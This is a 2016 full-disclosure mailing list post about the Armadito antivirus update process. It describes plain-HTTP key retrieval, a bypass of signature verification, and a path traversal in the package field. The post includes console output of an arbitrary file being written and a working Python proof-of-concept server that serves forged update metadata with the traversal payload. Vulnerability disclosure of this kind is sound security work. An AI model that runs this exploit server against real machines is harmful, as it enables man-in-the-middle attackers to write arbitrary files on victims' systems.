[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[FD] Aramadito remote arbitrary file write in case of MiTM
- To: Fulldisclosure <fulldisclosure@xxxxxxxxxxxx>
- Subject: [FD] Aramadito remote arbitrary file write in case of MiTM
- From: <thedeadcow@xxxxxxxxxxxx>
- Date: Mon, 27 Jun 2016 18:33:15 +0100 (BST)
Armadito (https://github.com/armadito) is a cross-platform open-source
antivirus, that was originally the DAVFI project, financed through a french
government program.
As a security product supposed to protect computers against malware, its
update system fails at multiple points:
* the public key used to check update packages is retrieved using plain HTTP.
The same goes for the packages themselves.
* if Armadito can't download this public key, a bug makes it consider any
file it checks as valid (you don't even need to forge a signature)
* a vulnerability as old as the General de Gaulle (path traversal) then
allows to download a controlled URL to an arbitrary path
All this allows someone in control of DNS answers or more generally in a MiTM
position to write arbitrary files when the update process is performed. It
also allows the editor to do it if they want (but db.armadito.org does not
seem to work at the time of writing this email). A simple python HTTP server
is attached to this mail as a proof-of-concept.
This happens in the ArmaditoSvc tool using the "--updatedb" flag. The
documentation doesn't specify if this should run as an administrator or not.
Here is an example of the output of this tool when a potential MiTM is
performed:
===========
C:\tmp\armadito>type ..\cow.txt
File specified not found.
C:\tmp\armadito>ArmaditoSvc.exe --updatedb
---------------------------------
----- Armadito Scan service -----
---------------------------------
[+] Debug :: UpdateModulesDB :: description file downloaded successfully!
[+] Debug :: UpdateModulesDB :: signature file downloaded successfully!
armadito[4624]: <error> [-] Error :: download_pub_key ::
URLDownloadToCacheFileA failed :: error = 0x800c0006
armadito[4624]: <error> [-] Error :: verify_file_signature :: Can't download
public key from armadito server!
armadito[4624]: <error> [-] Error :: verify_file_signature :: Crypt Destroy
Key failed! :: GLE = 0x57
[+] Debug :: UpdateModulesDB :: File Signature verified successfully !
[-] Error :: GetFileContent :: Opening the file failed! :: error = 3
[+] Debug :: DownloadPackageFiles :: Downloading file from ::
http://127.0.0.1/cow....
[+] Debug :: DownloadPackageFiles :: cache filename =
XX\AppData\Local\Microsoft\Windows\INetCache\IE\3YTFPC0U\cow[1].htm
[+] Debug :: ConvertBytesToChar :: string = 4dc9a4320e79db56894c037f27d5dc0a
[+] Debug :: DownloadPackageFiles :: checksum =
4dc9a4320e79db56894c037f27d5dc0a
[-] Warning :: no notify handler! :: call a6o_notify_set_handler first
[+] Debug :: UpdateModulesDB :: Armadito service suspended successfully!
[+] Debug :: get_db_module_path :: completePath =
C:\tmp\armadito\modules\DB\..\..\..\..\..\..\..\..\..\..\..\tmp\cow.txt
Conf_file = C:\tmp\armadito\conf\armadito.conf [+] Debug ::
init_configuration :: conf file = C:\tmp\armadito\conf\armadito.conf
armadito[4624]: <warning> cannot open conf file
C:\tmp\armadito\conf\armadito.conf
[+] Debug :: Configuration loaded successfully!
[+] Debug :: Armadito structure loaded successfully!
armadito[4624]: <error> [-] Error :: FilterConnectCommunicationPort() failed
:: errcode = 0x80070002
armadito[4624]: <error> Scan Thread initialization failed!
armadito[4624]: <error> Service loaded with errors during pause.
[+] Debug :: UpdateModulesDB :: Armadito service resumed successfully!
armadito[4624]: <error> [-] Error :: SaveHashInCacheFile :: Creating the
cache file failed! :: error = 3
[+] Debug :: UpdateModulesDB :: Modules Database updated successfully!
[-] Warning :: no notify handler! :: call a6o_notify_set_handler first
C:\tmp\armadito>type ..\cow.txt
put_your_dead_cow_here
==============
This is an irresponsible disclosure due to irresponsible spending of the
French people's money.
The Dead Cow.
from bottle import route, run, template, abort
import hashlib
IP = '127.0.0.1'
file_data = 'put_your_dead_cow_here'
def md5(d):
m = hashlib.md5()
m.update(d)
return m.hexdigest()
@route('/current/armaditodbvirus.json')
def get_db():
db = {'packageList':
[{'displayName': 'cow.txt',
'fileUrl': 'http://%s/cow' % IP,
'controlSum': md5(file_data),
'controlType': 'MD5',
'licence': '..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\tmp'
}]}
return db
@route('/current/armaditodbvirus.json.sig')
def get_db_sig():
# Because lol bis
return "signature checking is so overrated"
@route('/keys/a6o_rsa_pub.pem')
def get_db_sig():
# Because lol
abort(404, "public key cryptography is so overrated")
@route('/cow')
def get_cow():
return file_data
run(host=IP, port=80, debug=True)
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/